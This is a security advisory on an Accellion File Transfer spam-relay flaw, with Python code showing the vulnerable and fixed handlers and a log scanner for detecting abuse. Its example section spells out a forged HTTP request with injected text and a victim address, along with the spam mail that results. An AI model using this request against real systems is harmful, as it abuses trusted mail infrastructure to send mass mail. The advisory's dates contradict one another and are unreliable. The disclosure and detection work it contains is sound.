Title: Accellion File Transfer - SPAM Engine Vulnerabilities
Criticality: High (3/3)
Affected software: Accellion File Transfer FTA_7_0_178
Author: Eric BEAULIEU, eric.beaulieu [at] zebux.org, http://www.zebux.org
Discovery Date: 20-08-2008
Issue solved: 18-08-2008
Location URL: http://www.zebux.org/pub/Advisory/Advisory_Accellion_SPAM_Engine_Vulnerability_200808.txt
Summary
-------
Accellion File Transfer Appliance is prone to a vulnerability that can be exploited, without any authentication, by remote attackers to conduct a SPAM attack.
Description
-----------
A vulnerability has been discovered in the Accellion "error reporting page", which could be exploited to send mass mailings to internal or external email addresses. The error reporting page is used to inform the Accellion administrator and Accellion support that there is a problem on the appliance (for example, that a URL does not exist). Users have an interface to describe the problem and enter their email address in order to receive a message containing an Accellion support ticket ID.
However, if a malicious user appends a message to the error ID reference (in the URL address bar), he receives the ticket ID together with his message text. Malicious people could therefore use this URL to send external and internal mass mailings (because the Accellion appliance is always allowed to send external and internal mail through the SMTP infrastructure).
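The two handlers below illustrate the defect and its fix in Python. This is an added example written for this advisory; it is not Accellion's code, and the ticket-ID pattern, the session binding and the function names are assumptions modelled on the IDs and the form fields quoted in the advisory.

```python
import html
import re
from typing import Optional

# Assumed ticket-ID format, modelled on the "1002K725PI-888-100" IDs quoted in the
# advisory; it is a constructed example pattern, not Accellion's real validation rule.
TICKET_ID_RE = re.compile(r"[0-9A-Z]{10}-[0-9]{3}-[0-9]{3}")


class RejectedReport(ValueError):
    """Raised when an error-report submission fails validation."""


def build_report_mail_vulnerable(error_id: str, client_email: str) -> dict:
    """Reproduces the flaw described above: the id taken from the URL is copied
    unchanged into the subject and body, and the mail is addressed to whatever
    address the form carried, so the page works as an open mail relay."""
    return {
        "to": client_email,
        "subject": f"API Error Report: {error_id}",
        "body": f"Hi {client_email.split('@')[0]},\nError ID {error_id}\n",
    }


def build_report_mail_hardened(error_id: str, client_email: str,
                               session_email: Optional[str]) -> dict:
    """Hardened form. Three changes close the mass-mailing channel:
    1. the id must be a well-formed ticket reference, so free text and markup
       are rejected instead of being echoed into the mail;
    2. the confirmation goes only to the address bound to the caller's session,
       so an unauthenticated caller gets no mail at all;
    3. the id is HTML-escaped before it is placed in any mail part (defence in depth)."""
    if not TICKET_ID_RE.fullmatch(error_id):
        raise RejectedReport("malformed error id")
    if session_email is None or client_email.lower() != session_email.lower():
        raise RejectedReport("recipient is not the authenticated user")
    safe_id = html.escape(error_id)
    return {
        "to": session_email,
        "subject": f"API Error Report: {safe_id}",
        "body": f"Error ID {safe_id}\n",
    }


if __name__ == "__main__":
    # The id string below is the one quoted in the advisory's example request.
    injected = "1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>"
    print(build_report_mail_vulnerable(injected, "email_to_spam@victim_domain.com"))
    try:
        build_report_mail_hardened(injected, "email_to_spam@victim_domain.com", None)
    except RejectedReport as exc:
        print("rejected:", exc)
    print(build_report_mail_hardened("1002K725PI-888-100", "alice@example.org",
                                     "alice@example.org"))
```

The strict ID check alone would already stop the message text from reaching the mail; binding the recipient to the session is what removes the relay property, because a caller can then only mail an address he already controls.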
Example:
To exploit this vulnerability, you have to forge a malicious HTTP request (for example with the Firefox extension Live HTTP Headers):
URL:
https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
HTTP HEADER:
Host: [Accelion web server]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-fr;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://[Accelion web server]/courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
POST DATA:
description=Could+you+please+close+this+tickets%0D%0A%0D%0ARegards&client_email=email_to_spam%40victim_domain.com&submit=Soumettre+le+rapport
The resulting malicious message will be:
From : support@accellion.com [mailto:support@accellion.com]
À : email_to_spam@victim_domain.com
Objet : API Error Report: 1002K725PI-888-100Test_SPAM <H1>SPAM_ATTACK</H1>
Hi email_to_spam,
Error ID 1002K725PI-888-100Test_SPAM
SPAM_ATTACK
Timestamp 2008-08-19 08:20:53 GMT
This email has been sent to you for your own reference.
We will attend to this error report as soon as possible.
Thank you for using Secure File Transfer.
________________________________________
Accellion Pte Ltd
http://www.accellion.com
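For operators who cannot upgrade immediately, the request shape above is easy to spot in the web server log. The following scanner is an added example for this advisory, not a tool shipped by Accellion: it assumes Common Log Format access logs, the constructed sample lines embedded below (documentation-range IPs), and the same assumed ticket-ID pattern as the advisory's quoted IDs.

```python
import re
from collections import Counter
from typing import List, Tuple
from urllib.parse import parse_qs, urlsplit

# Common Log Format: client, identity, user, [timestamp], "request line", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
# Assumed well-formed ticket id, modelled on the IDs quoted in the advisory.
TICKET_ID_RE = re.compile(r"[0-9A-Z]{10}-[0-9]{3}-[0-9]{3}")
ERROR_PAGE = "api_error_email.html"

# Constructed sample log lines; they are not real appliance output.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Aug/2008:08:20:53 +0000] "POST /courier/1000@/api_error_email.html?id=1002K725PI-888-100Test_SPAM%20%3CH1%3ESPAM_ATTACK%3C/H1%3E HTTP/1.1" 200 512
198.51.100.9 - - [19/Aug/2008:08:21:10 +0000] "POST /courier/1000@/api_error_email.html?id=1002K725PI-888-100 HTTP/1.1" 200 512
203.0.113.5 - - [19/Aug/2008:08:21:20 +0000] "POST /courier/1000@/api_error_email.html?id=1002K725PI-888-101 HTTP/1.1" 200 512
203.0.113.5 - - [19/Aug/2008:08:21:21 +0000] "POST /courier/1000@/api_error_email.html?id=1002K725PI-888-102 HTTP/1.1" 200 512
198.51.100.9 - - [19/Aug/2008:08:25:00 +0000] "GET /courier/web/1000@/wmLogin.html HTTP/1.1" 200 2048
"""


def scan_error_report_log(text: str, burst_threshold: int = 3) -> List[Tuple[str, str, str]]:
    """Return (client_ip, reason, detail) alerts for two signals:
    - 'malformed-id': the id parameter is not a plain ticket reference; spaces,
      markup or trailing free text mean it was hand-edited in the URL bar;
    - 'burst': one client POSTed to the error page at least burst_threshold
      times, the footprint a mass-mailing run would leave."""
    alerts: List[Tuple[str, str, str]] = []
    posts_per_client: Counter = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        client, _ts, method, target, _status, _size = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith(ERROR_PAGE):
            continue
        if method == "POST":
            posts_per_client[client] += 1
        # parse_qs percent-decodes the value, so "%3CH1%3E" is inspected as "<H1>".
        for raw_id in parse_qs(parts.query).get("id", []):
            if not TICKET_ID_RE.fullmatch(raw_id):
                alerts.append((client, "malformed-id", raw_id))
    for client, n in posts_per_client.items():
        if n >= burst_threshold:
            alerts.append((client, "burst", f"{n} error reports"))
    return alerts


if __name__ == "__main__":
    for client, reason, detail in scan_error_report_log(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{detail}")
```

Because the mail is sent regardless of whether the id is valid, a low burst threshold per source address is the more reliable of the two signals; the malformed-id check only catches submissions that carry the injected message text in the URL.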
Solution
--------
Upgrade to version FTA_7_0_189
Workaround
----------
There is no workaround.
References
----------
FrSIRT Advisory:
Bugtraq ID: 31178
Websense Advisory URL:
Secunia Advisory ID: SA31848
CVE ID:
Security Tracker: 1020870
Timeline
--------
20-08-2008 - Vulnerability discovered
21-08-2008 - Vulnerability reported to vendor
22-08-2008 - Vendor reported the status of the fix process
28-08-2006 - Vendor published the new version and contacted Accellion customers
Revision history
----------------
18-08-2008 - 1.0 - Advisory written